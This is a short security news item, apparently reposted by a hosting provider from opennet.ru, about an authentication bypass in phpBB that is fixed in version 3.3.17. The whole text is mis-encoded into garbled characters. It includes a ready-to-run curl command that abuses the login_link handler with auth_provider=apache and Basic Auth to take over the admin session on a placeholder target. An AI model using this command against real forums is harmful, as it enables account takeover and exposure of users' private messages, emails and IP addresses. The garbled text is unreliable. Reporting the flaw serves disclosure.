เบŠเปˆเบญเบ‡เป‚เบซเบงเปˆเปƒเบ™ phpBB เบŠเปˆเบงเบเปƒเบซเป‰เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบšเบฑเบ™เบŠเบตเปƒเบ”เบเปเป„เบ”เป‰เป‚เบ”เบเบšเปเปˆเบ•เป‰เบญเบ‡เบกเบตเบเบฒเบ™เบขเบทเบ™เบขเบฑเบ™เบ•เบปเบงเบ•เบปเบ™

ะ’ ัะฒะพะฑะพะดะฝะพะผ ะดะฒะธะถะบะต ะดะปั ัะพะทะดะฐะฝะธั ั„ะพั€ัƒะผะพะฒ phpBB ะฒั‹ัะฒะปะตะฝะฐ ัƒัะทะฒะธะผะพัั‚ัŒ, ะฟะพะทะฒะพะปััŽั‰ะฐั ั‡ะตั€ะตะท ะพั‚ะฟั€ะฐะฒะบัƒ ะพะดะฝะพะณะพ HTTP-ะทะฐะฟั€ะพัะฐ ะฟะพะดะบะปัŽั‡ะธั‚ัŒัั ะบ ัะตะฐะฝััƒ ะปัŽะฑะพะณะพ ะฟะพะปัŒะทะพะฒะฐั‚ะตะปั ั„ะพั€ัƒะผะฐ. ะฃัะทะฒะธะผะพัั‚ัŒ ะฟั€ะพัะฒะปัะตั‚ัั ะฒ ะบะพะฝั„ะธะณัƒั€ะฐั†ะธะธ phpBB ะฟะพ ัƒะผะพะปั‡ะฐะฝะธัŽ. ะŸั€ะพะฑะปะตะผะฐ ัƒัั‚ั€ะฐะฝะตะฝะฐ ะฒ ะฒะตั€ัะธะธ phpBB 3.3.17.

ะŸั€ะธ ะฐั‚ะฐะบะต ะฝะฐ ะพะฑั‹ั‡ะฝั‹ั… ะฟะพะปัŒะทะพะฒะฐั‚ะตะปะตะน ะผะพะถะฝะพ ะฟะพะปัƒั‡ะธั‚ัŒ ะดะพัั‚ัƒะฟ ะบ ะฟั€ะธะฒะฐั‚ะฝะพะน ะฟะตั€ะตะฟะธัะบะต ะธ ะฒะพะทะผะพะถะฝะพัั‚ะธ ะพั‚ะฟั€ะฐะฒะปัั‚ัŒ ัะพะพะฑั‰ะตะฝะธั ะพั‚ ะธะผะตะฝะธ ะฟะพะปัŒะทะพะฒะฐั‚ะตะปั. ะŸั€ะธ ะฐั‚ะฐะบะต ะฝะฐ ะผะพะดะตั€ะฐั‚ะพั€ะพะฒ ะธ ะฐะดะผะธะฝะธัั‚ั€ะฐั‚ะพั€ะพะฒ ะผะพะถะฝะพ ัƒะดะฐะปัั‚ัŒ ั‡ัƒะถะธะต ัะพะพะฑั‰ะตะฝะธั, ะฟั€ะพัะผะฐั‚ั€ะธะฒะฐั‚ัŒ IP-ะฐะดั€ะตัะฐ ะธ email, ั‡ะธั‚ะฐั‚ัŒ ะฟั€ะธะฒะฐั‚ะฝัƒัŽ ะฟะตั€ะตะฟะธัะบัƒ, ะฝะพ ะฝะตะปัŒะทั ะทะฐะนั‚ะธ ะฒ ะธะฝั‚ะตั€ั„ะตะนั ะฐะดะผะธะฝะธัั‚ั€ะฐั‚ะพั€ะฐ ะธ ะฟะพะปัƒั‡ะธั‚ัŒ ะดะพัั‚ัƒะฟ ะบ ั…ะพัั‚ัƒ.

ะ”ะตั‚ะฐะปะธ ะพะฑ ัƒัะทะฒะธะผะพัั‚ะธ ะฝะต ะฟั€ะธะฒะพะดัั‚ัั, ะฝะพ ะฟั€ะธ ะฟะพะผะพั‰ะธ AI ะฝะฐ ะพัะฝะพะฒะต ะธัะฟั€ะฐะฒะปะตะฝะธั ัƒะถะต ะฒะพััะพะทะดะฐะฝ ะผะตั‚ะพะด ัะบัะฟะปัƒะฐั‚ะฐั†ะธะธ, ะพัะฝะพะฒะฐะฝะฝั‹ะน ะฝะฐ ะพะฑั€ะฐั‰ะตะฝะธะธ ะบ ะพะฑั€ะฐะฑะพั‚ั‡ะธะบัƒ ยซlogin_linkยป ั ะฒั‹ัั‚ะฐะฒะปะตะฝะธะตะผ ะผะตั‚ะพะดะฐ ะฐัƒั‚ะตะฝั‚ะธั„ะธะบะฐั†ะธะธ ยซauth_provider=apacheยป ะธ ะฟะพะดัั‚ะฐะฝะพะฒะบะพะน ะปะพะณะธะฝะฐ ั‡ะตั€ะตะท Basic Auth, ะฟะพัะปะต ั‡ะตะณะพ PHP ะฒั‹ัั‚ะฐะฒะธั‚ ะฟะตั€ะตะผะตะฝะฝัƒัŽ ะพะบั€ัƒะถะตะฝะธั ยซPHP_AUTH_USER=ะปะพะณะธะฝยป, ะฐ phpBB ะธะทะฒะปะตั‡ั‘ั‚ ะธะท ะฝะตั‘ ะปะพะณะธะฝ ะฟะพะปัŒะทะพะฒะฐั‚ะตะปั ะฑะตะท ะฟั€ะพะฒะตั€ะบะธ ะฟะฐั€ะพะปั. ะะฐะฟั€ะธะผะตั€, ะดะปั ะฟะพะปัƒั‡ะตะฝะธั ะธะดะตะฝั‚ะธั„ะธะบะฐั‚ะพั€ะฐ ัะตััะธะธ ะฟะพะปัŒะทะพะฒะฐั‚ะตะปั admin ะธ ัะพั…ั€ะฐะฝะตะฝะธั ะตะณะพ ะฒ ั„ะฐะนะป cookies.txt ะผะพะถะฝะพ ะฒั‹ะฟะพะปะฝะธั‚ัŒ ะบะพะด:

curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u โ€˜admin:anythingโ€™ \
-d โ€˜login=Login&login_username=admin&login_password=anythingโ€™ \
โ€˜https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1โ€™

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: opennet.ru

เบŠเบทเป‰เป‚เบฎเบ”เบ•เบดเป‰เบ‡เบ—เบตเปˆเป€เบŠเบทเปˆเบญเบ–เบทเป„เบ”เป‰เบชเปเบฒเบฅเบฑเบšเป€เบงเบฑเบšเป„เบŠเบ—เปŒเบ—เบตเปˆเบกเบตเบเบฒเบ™เบ›เบปเบเบ›เป‰เบญเบ‡ DDoS, เป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ VPS VDS ๐Ÿ”ฅ เบŠเบทเป‰เป€เบงเบฑเบšเป„เบŠเบ—เปŒเป‚เบฎเบ”เบ•เบดเป‰เบ‡เบ—เบตเปˆเป€เบŠเบทเปˆเบญเบ–เบทเป„เบ”เป‰เบ”เป‰เบงเบเบเบฒเบ™เบ›เป‰เบญเบ‡เบเบฑเบ™ DDoS, เป€เบŠเบตเบšเป€เบงเบต VPS VDS | ProHoster